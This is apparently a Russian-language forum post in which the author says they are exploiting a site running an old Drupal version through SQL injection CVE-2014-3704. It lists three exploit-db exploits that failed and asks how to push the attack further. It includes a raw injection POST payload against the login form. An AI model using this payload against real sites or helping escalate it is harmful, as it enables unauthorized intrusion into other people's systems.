Есть сайт со sqli (старая версия drupal) CVE-2014-3704
Использовал следующие эксплоиты:
http://www.exploit-db.com/exploits/34993/
http://www.exploit-db.com/exploits/34992/
http://www.exploit-db.com/exploits/34984/
Но ни один не сработал, хотя и пишут, что новый пользователь был успешно создан.
Как раскрутить я не знаю.
Sqli при пост запросе:
http://www.site.com/?q=node&destination=node
name[0']=0;&name[0]=asd&pass=asd&test2=test&form_build_id=&form_id=us er_login_block&op=Log%2Bin
output: